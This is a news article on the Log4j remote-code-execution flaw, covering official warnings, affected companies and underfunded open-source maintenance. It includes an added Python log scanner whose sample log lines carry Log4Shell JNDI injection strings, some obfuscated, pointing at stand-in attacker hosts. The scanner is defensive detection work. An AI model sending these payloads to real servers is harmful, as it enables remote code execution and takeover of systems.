Software Vulnerability: There's A Fire In The Internet

A bug in a widely used piece of software makes prominent services from Apple to Amazon vulnerable. The case shows how dependent the Internet is on the work of volunteers.

Apple iCloud, Amazon, Steam, Minecraft: some of the world's best-known online applications were, or apparently still are, vulnerable. Because of a flaw in Log4j, a software component built into a large number of programs, attackers can run malicious code on other people's systems and possibly even take them over completely.

The German Federal Office for Information Security (BSI) speaks of an "extremely critical threat situation" and has issued a red warning, its highest alert level.

IT security experts sometimes choose even more drastic words: "The Internet is on fire right now," Adam Meyers of the security company Crowdstrike told the AP news agency.

End users are also potentially affected by the problem. "This security hole harbors the risk that your computer will be compromised," writes the maker of the game Minecraft in a blog entry, along with instructions on how players should respond. In practice, however, there is little end users can do beyond making sure they are running the latest software versions (which is always good advice anyway).


According to the BSI, all administrators and developers who use Log4j should act immediately. An update is already available, and technically it closes the gap. However, the problem is far from over. First, the update has to be installed everywhere: Log4j is not installed once per system but bundled inside each application that uses it, so every affected application needs its own updated build. Second, the applications themselves may still have to be adapted. "The patch management of Java applications is not trivial," writes the BSI, which has published a list of countermeasures for developers.

The case shows once again how dependent large parts of the digital infrastructure are on individual software modules. Log4j is a library for the Java programming language. Think of a library as a collection of ready-made building blocks: so that developers don't have to program everything from scratch every time, certain program functions are bundled in libraries that can be imported into a project and used directly. Some of these libraries are extremely widespread.


Log4j is used to record, or log, what a program is doing. Software developers use such a log, for example, to check whether the program is running properly or to trace problems after the fact. User input can also end up in the log. This is exactly where the Log4j vulnerability lies.

As an IT security company demonstrated, attackers can get their own code executed through the logging mechanism. To do this, a specially crafted string is entered wherever input is likely to be logged, for example in a website's search box, in a chat, or in the field where the username normally goes. When Log4j writes that string to the log, it interprets it as a lookup instruction and makes the website's server connect to another server, for instance one from which malicious software is then downloaded and run. The technical term for this type of attack is remote code execution.
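Because the malicious string has to pass through the application's input fields before it reaches the log, the first thing a defender can do is search existing web-server or application logs for it. The scanner below is an added example written for this article, not code from Log4j, the BSI or any of the companies mentioned; it looks for the lookup pattern described above in access-log lines, and also undoes the two tricks attackers commonly use to hide it, URL-encoding and nested lookups that spell the keyword indirectly (Log4j evaluates `${lower:j}` to `j` and `${anything:-j}` to `j` when the lookup key resolves to nothing). The log lines, IP addresses and host names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Innermost lookups whose evaluated value is trivially known. Attackers nest these
# inside the outer lookup so that the keyword never appears literally in a request.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)   # ${lower:X} -> x
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")                     # ${key:-X} -> X
# The outer lookup once normalized: ${jndi:<scheme>://<host>...
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def normalize(s: str, rounds: int = 10) -> str:
    """Undo URL-encoding and collapse nested lookups to approximate what Log4j would evaluate."""
    for _ in range(3):                       # handle single or double URL-encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(rounds):                  # resolve innermost lookups until nothing changes
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def scan_line(line: str):
    """Return (scheme, host) of the first JNDI lookup found in the line, or None."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    return m.group(1).lower(), m.group(2)


def scan_log(lines):
    """Return a list of (line_number, scheme, host) for every line that carries a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = scan_line(line)
        if found:
            hits.append((n, *found))
    return hits


# Constructed sample access-log lines (not real traffic); RFC 5737 addresses and .example hosts.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /search?q=log4j HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:00:03 +0000] "GET /login?user=${${lower:j}ndi:rmi://attacker.example/x} HTTP/1.1" 200 "curl/7.79"',
    '203.0.113.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F192.0.2.9%2Fz%7D HTTP/1.1" 200 "-"',
    '203.0.113.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${${env:NOPE:-j}${env:NOPE:-n}di:dns://probe.example/x} HTTP/1.1" 200 "-"',
]

if __name__ == "__main__":
    for n, scheme, host in scan_log(SAMPLE_LOG):
        print(f"line {n}: lookup via {scheme} to {host}")
```

Running the block flags lines 2 to 5: a plain lookup in the User-Agent header, a `${lower:j}` obfuscation in the username, a URL-encoded `${::-j}` variant, and a `${env:...:-x}` default-value variant. Two caveats for anyone using this for triage: Log4j's lookup language is richer than the two forms handled here, so a clean scan is not proof that nothing got through, and a hit only proves that someone sent the string, not that the application logged it or that the server actually connected out; that has to be confirmed from outbound-connection or DNS logs.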

This potentially affects every application that uses Log4j to log user input, and apparently there are very, very many of them. The security company LunaSec, which was the first to report on the vulnerability on Thursday, describes Log4j as "ubiquitous". A list of apparently confirmed cases, maintained by a GitHub user, also includes prominent names such as Tesla and Google.

Applications that are less well known to the general public but central to the digital infrastructure are apparently also affected. The software manufacturer VMware and the web infrastructure provider Cloudflare have confirmed as much. Cloudflare CEO Matthew Prince tweeted that the situation was so bad his company would extend protection even to customers who do not pay for its firewall. That has since happened, but it cannot offer complete protection. Everyone affected should "patch as soon as possible!", Prince wrote. "This is a serious vulnerability that is actively being exploited."


It is not yet possible to predict how serious the consequences of the gap will be. That depends, on the one hand, on how many systems are actually affected and, on the other, on how quickly they are patched. Experience with other security flaws in widely used software shows that many systems remain vulnerable long after a patch has been released.

That criminals immediately began scanning for vulnerable systems and exploiting the flaw was shown, among other things, by the findings of the Telekom Computer Emergency Response Team. "Unfortunately, not only security teams but also hackers are working overtime to find the answer," Rüdiger Trost of the IT security company F-Secure told the dpa news agency. For now, he warned, attackers may merely be using the gap to plant inconspicuous back doors for themselves. "The actual attacks will certainly take place weeks or many months later."

The story also sheds light on a peculiarity of the software world that has given rise to various insider jokes: some of the small program modules that are extremely widespread are developed and maintained by a handful of enthusiasts. Log4j is a project of the Apache Software Foundation, an organization that develops open source software. Its programs and frameworks are in part essential to large parts of the Internet. Although companies such as Amazon, Microsoft and Google donate money to the foundation, the work on the projects is done by volunteers. In the case of Log4j, there is talk online of three people; others speak of six.

"The Log4j maintainers have been working sleeplessly on remedial measures," wrote Volkan Yazıcı, who was involved, on Twitter. "Yet nothing stops people from berating us for work we are not paid for, for a feature none of us like but which had to be kept for backward-compatibility reasons."

That there is such a dependency on poorly financed projects is a big problem, wrote Henning Tillmann, chairman of the network policy think tank D64, on Twitter. Large corporations that use technology from "hobby developers" do not share enough of their profits with them. His conclusion: "Then politics has to regulate it."
